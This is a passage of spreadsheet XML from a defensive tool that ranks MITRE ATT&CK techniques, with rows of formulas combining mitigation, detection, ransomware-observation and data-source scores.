      <c r="T242" s="57" t="s">
        <v>851</v>
      </c>
      <c r="U242" s="57">
        <v>8</v>
      </c>
      <c r="V242" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.22380952380952385</v>
      </c>
      <c r="W242" s="37">
        <v>22</v>
      </c>
      <c r="X242" s="37">
        <v>0.4</v>
      </c>
      <c r="Y242" s="37">
        <v>0.4</v>
      </c>
      <c r="Z242" s="37">
        <v>3</v>
      </c>
      <c r="AA242" s="37">
        <v>0.03</v>
      </c>
      <c r="AB242" s="37">
        <v>0.03</v>
      </c>
      <c r="AC242" s="37"/>
      <c r="AD242" s="50" t="s">
        <v>218</v>
      </c>
      <c r="AE242" s="37" t="str" cm="1">
        <f t="array" ref="AE242">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD242)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF242" s="37">
        <v>238</v>
      </c>
      <c r="AG242" s="37" t="str" cm="1">
        <f t="array" ref="AG242">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD242)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH242" s="37">
        <v>238</v>
      </c>
      <c r="AI242" s="37" t="str" cm="1">
        <f t="array" ref="AI242">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD242)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ242" s="37">
        <v>238</v>
      </c>
      <c r="AK242" s="37" t="str" cm="1">
        <f t="array" ref="AK242">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD242)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL242" s="37">
        <v>238</v>
      </c>
      <c r="AM242" s="37" t="str" cm="1">
        <f t="array" ref="AM242">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD242)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN242" s="37">
        <v>0</v>
      </c>
      <c r="AO242" s="37">
        <v>1</v>
      </c>
      <c r="AP242" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ242" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>102.86349206349207</v>
      </c>
      <c r="AR242" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS242" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT242" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU24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2.4729402872260016</v>
      </c>
    </row>
    <row r="243" spans="1:47" ht="17">
      <c r="A243" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B243" s="37">
        <f t="shared" si="3"/>
        <v>319.00000000000006</v>
      </c>
      <c r="C243" s="37" t="s">
        <v>855</v>
      </c>
      <c r="D243" s="50" t="s">
        <v>849</v>
      </c>
      <c r="E243" s="37" t="s">
        <v>856</v>
      </c>
      <c r="F243" s="37">
        <v>1</v>
      </c>
      <c r="G243" s="37">
        <v>1</v>
      </c>
      <c r="H243" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I243" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J243" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K243" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L243" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M243" s="37">
        <v>0</v>
      </c>
      <c r="N243" s="56">
        <v>0</v>
      </c>
      <c r="O243" s="56">
        <v>0</v>
      </c>
      <c r="P243" s="56">
        <v>4</v>
      </c>
      <c r="Q243" s="56">
        <v>1</v>
      </c>
      <c r="R243" s="57" t="s">
        <v>850</v>
      </c>
      <c r="S243" s="57">
        <v>14</v>
      </c>
      <c r="T243" s="57" t="s">
        <v>851</v>
      </c>
      <c r="U243" s="57">
        <v>8</v>
      </c>
      <c r="V243" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.23333333333333336</v>
      </c>
      <c r="W243" s="37">
        <v>22</v>
      </c>
      <c r="X243" s="37">
        <v>0.4</v>
      </c>
      <c r="Y243" s="37">
        <v>0.4</v>
      </c>
      <c r="Z243" s="37">
        <v>5</v>
      </c>
      <c r="AA243" s="37">
        <v>0.05</v>
      </c>
      <c r="AB243" s="37">
        <v>0.05</v>
      </c>
      <c r="AC243" s="37"/>
      <c r="AD243" s="50" t="s">
        <v>218</v>
      </c>
      <c r="AE243" s="37" t="str" cm="1">
        <f t="array" ref="AE243">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD243)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF243" s="37">
        <v>239</v>
      </c>
      <c r="AG243" s="37" t="str" cm="1">
        <f t="array" ref="AG243">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD243)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH243" s="37">
        <v>239</v>
      </c>
      <c r="AI243" s="37" t="str" cm="1">
        <f t="array" ref="AI243">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD243)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ243" s="37">
        <v>239</v>
      </c>
      <c r="AK243" s="37" t="str" cm="1">
        <f t="array" ref="AK243">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD243)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL243" s="37">
        <v>239</v>
      </c>
      <c r="AM243" s="37" t="str" cm="1">
        <f t="array" ref="AM243">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD243)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN243" s="37">
        <v>0</v>
      </c>
      <c r="AO243" s="37">
        <v>1</v>
      </c>
      <c r="AP243" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ243" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>106.33333333333336</v>
      </c>
      <c r="AR243" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS243" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT243" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU24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2.5555555555555558</v>
      </c>
    </row>
    <row r="244" spans="1:47" ht="17">
      <c r="A244" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B244" s="37">
        <f t="shared" si="3"/>
        <v>215.08113542857143</v>
      </c>
      <c r="C244" s="37" t="s">
        <v>857</v>
      </c>
      <c r="D244" s="50" t="s">
        <v>849</v>
      </c>
      <c r="E244" s="37" t="s">
        <v>858</v>
      </c>
      <c r="F244" s="37">
        <v>1</v>
      </c>
      <c r="G244" s="37">
        <v>1</v>
      </c>
      <c r="H244" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I244" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J244" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K244" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L244" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M244" s="37">
        <v>0</v>
      </c>
      <c r="N244" s="56">
        <v>0</v>
      </c>
      <c r="O244" s="56">
        <v>0</v>
      </c>
      <c r="P244" s="56">
        <v>0</v>
      </c>
      <c r="Q244" s="56">
        <v>0</v>
      </c>
      <c r="R244" s="57" t="s">
        <v>859</v>
      </c>
      <c r="S244" s="57">
        <v>2</v>
      </c>
      <c r="T244" s="57" t="s">
        <v>860</v>
      </c>
      <c r="U244" s="57">
        <v>11</v>
      </c>
      <c r="V244" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.12380971428571429</v>
      </c>
      <c r="W244" s="37">
        <v>13</v>
      </c>
      <c r="X244" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Y244" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Z244" s="37">
        <v>0</v>
      </c>
      <c r="AA244" s="37">
        <v>0</v>
      </c>
      <c r="AB244" s="37">
        <v>0</v>
      </c>
      <c r="AC244" s="37"/>
      <c r="AD244" s="50" t="s">
        <v>861</v>
      </c>
      <c r="AE244" s="37" t="str" cm="1">
        <f t="array" ref="AE244">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD244)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF244" s="37">
        <v>240</v>
      </c>
      <c r="AG244" s="37" t="str" cm="1">
        <f t="array" ref="AG244">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD244)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH244" s="37">
        <v>240</v>
      </c>
      <c r="AI244" s="37" t="str" cm="1">
        <f t="array" ref="AI244">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD244)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ244" s="37">
        <v>240</v>
      </c>
      <c r="AK244" s="37" t="str" cm="1">
        <f t="array" ref="AK244">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD244)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL244" s="37">
        <v>240</v>
      </c>
      <c r="AM244" s="37" t="str" cm="1">
        <f t="array" ref="AM244">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD244)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN244" s="37">
        <v>0</v>
      </c>
      <c r="AO244" s="37">
        <v>0</v>
      </c>
      <c r="AP244" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ244" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>71.693711809523805</v>
      </c>
      <c r="AR244" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS244" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT244" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU24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45" spans="1:47" ht="51">
      <c r="A245" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B245" s="37">
        <f t="shared" si="3"/>
        <v>661.64678166666658</v>
      </c>
      <c r="C245" s="37" t="s">
        <v>862</v>
      </c>
      <c r="D245" s="50" t="s">
        <v>863</v>
      </c>
      <c r="E245" s="37"/>
      <c r="F245" s="37">
        <v>2</v>
      </c>
      <c r="G245" s="37">
        <v>3</v>
      </c>
      <c r="H245" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.25</v>
      </c>
      <c r="I245" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J245" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K245" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.3</v>
      </c>
      <c r="L245" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="M245" s="37">
        <v>4.9930000000000002E-2</v>
      </c>
      <c r="N245" s="56">
        <v>2</v>
      </c>
      <c r="O245" s="56">
        <v>16</v>
      </c>
      <c r="P245" s="56">
        <v>1</v>
      </c>
      <c r="Q245" s="56">
        <v>6</v>
      </c>
      <c r="R245" s="57" t="s">
        <v>864</v>
      </c>
      <c r="S245" s="57">
        <v>14</v>
      </c>
      <c r="T245" s="57" t="s">
        <v>865</v>
      </c>
      <c r="U245" s="57">
        <v>14</v>
      </c>
      <c r="V245" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.38571433333333327</v>
      </c>
      <c r="W245" s="37">
        <v>28</v>
      </c>
      <c r="X245" s="37">
        <v>0.50909099999999996</v>
      </c>
      <c r="Y245" s="37">
        <v>0.50909099999999996</v>
      </c>
      <c r="Z245" s="37">
        <v>25</v>
      </c>
      <c r="AA245" s="37">
        <v>0.25</v>
      </c>
      <c r="AB245" s="37">
        <v>0.25</v>
      </c>
      <c r="AC245" s="37"/>
      <c r="AD245" s="50" t="s">
        <v>816</v>
      </c>
      <c r="AE245" s="37" t="str" cm="1">
        <f t="array" ref="AE245">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD245)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF245" s="37">
        <v>241</v>
      </c>
      <c r="AG245" s="37" t="str" cm="1">
        <f t="array" ref="AG245">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD245)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH245" s="37">
        <v>241</v>
      </c>
      <c r="AI245" s="37" t="str" cm="1">
        <f t="array" ref="AI245">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD245)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ245" s="37">
        <v>241</v>
      </c>
      <c r="AK245" s="37" t="str" cm="1">
        <f t="array" ref="AK245">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD245)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL245" s="37">
        <v>241</v>
      </c>
      <c r="AM245" s="37" t="str" cm="1">
        <f t="array" ref="AM245">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD245)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN245" s="37">
        <v>0</v>
      </c>
      <c r="AO245" s="37">
        <v>1</v>
      </c>
      <c r="AP245" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ245" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>220.5489272222222</v>
      </c>
      <c r="AR245" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS245" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT245" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU24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5.2749744576719566</v>
      </c>
    </row>
    <row r="246" spans="1:47" ht="68">
      <c r="A246" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B246" s="37">
        <f t="shared" si="3"/>
        <v>239.94262642857146</v>
      </c>
      <c r="C246" s="37" t="s">
        <v>866</v>
      </c>
      <c r="D246" s="50" t="s">
        <v>867</v>
      </c>
      <c r="E246" s="37"/>
      <c r="F246" s="37">
        <v>1</v>
      </c>
      <c r="G246" s="37">
        <v>1</v>
      </c>
      <c r="H246" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I246" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J246" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K246" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L246" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M246" s="37">
        <v>0</v>
      </c>
      <c r="N246" s="56">
        <v>0</v>
      </c>
      <c r="O246" s="56">
        <v>1</v>
      </c>
      <c r="P246" s="56">
        <v>0</v>
      </c>
      <c r="Q246" s="56">
        <v>2</v>
      </c>
      <c r="R246" s="57" t="s">
        <v>868</v>
      </c>
      <c r="S246" s="57">
        <v>6</v>
      </c>
      <c r="T246" s="57" t="s">
        <v>869</v>
      </c>
      <c r="U246" s="57">
        <v>8</v>
      </c>
      <c r="V246" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.14761880952380954</v>
      </c>
      <c r="W246" s="37">
        <v>14</v>
      </c>
      <c r="X246" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Y246" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Z246" s="37">
        <v>3</v>
      </c>
      <c r="AA246" s="37">
        <v>0.03</v>
      </c>
      <c r="AB246" s="37">
        <v>0.03</v>
      </c>
      <c r="AC246" s="37"/>
      <c r="AD246" s="50" t="s">
        <v>870</v>
      </c>
      <c r="AE246" s="37" t="str" cm="1">
        <f t="array" ref="AE246">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD246)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF246" s="37">
        <v>242</v>
      </c>
      <c r="AG246" s="37" t="str" cm="1">
        <f t="array" ref="AG246">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD246)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH246" s="37">
        <v>242</v>
      </c>
      <c r="AI246" s="37" t="str" cm="1">
        <f t="array" ref="AI246">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD246)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ246" s="37">
        <v>242</v>
      </c>
      <c r="AK246" s="37" t="str" cm="1">
        <f t="array" ref="AK246">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD246)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL246" s="37">
        <v>242</v>
      </c>
      <c r="AM246" s="37" t="str" cm="1">
        <f t="array" ref="AM246">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD246)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN246" s="37">
        <v>0</v>
      </c>
      <c r="AO246" s="37">
        <v>1</v>
      </c>
      <c r="AP246" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ246" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>79.980875476190491</v>
      </c>
      <c r="AR246" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS246" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT246" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU24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1.9281160827664401</v>
      </c>
    </row>
    <row r="247" spans="1:47" ht="64" customHeight="1">
      <c r="A247" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B247" s="37">
        <f t="shared" si="3"/>
        <v>255.76185333333336</v>
      </c>
      <c r="C247" s="37" t="s">
        <v>871</v>
      </c>
      <c r="D247" s="50" t="s">
        <v>872</v>
      </c>
      <c r="E247" s="37"/>
      <c r="F247" s="37">
        <v>1</v>
      </c>
      <c r="G247" s="37">
        <v>1</v>
      </c>
      <c r="H247" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I247" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J247" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K247" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L247" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M247" s="37">
        <v>5.7159999999999997E-3</v>
      </c>
      <c r="N247" s="56">
        <v>0</v>
      </c>
      <c r="O247" s="56">
        <v>2</v>
      </c>
      <c r="P247" s="56">
        <v>0</v>
      </c>
      <c r="Q247" s="56">
        <v>5</v>
      </c>
      <c r="R247" s="57" t="s">
        <v>873</v>
      </c>
      <c r="S247" s="57">
        <v>8</v>
      </c>
      <c r="T247" s="57" t="s">
        <v>874</v>
      </c>
      <c r="U247" s="57">
        <v>5</v>
      </c>
      <c r="V247" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.15714304761904763</v>
      </c>
      <c r="W247" s="37">
        <v>13</v>
      </c>
      <c r="X247" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Y247" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Z247" s="37">
        <v>7</v>
      </c>
      <c r="AA247" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB247" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC247" s="37"/>
      <c r="AD247" s="50" t="s">
        <v>875</v>
      </c>
      <c r="AE247" s="37" t="str" cm="1">
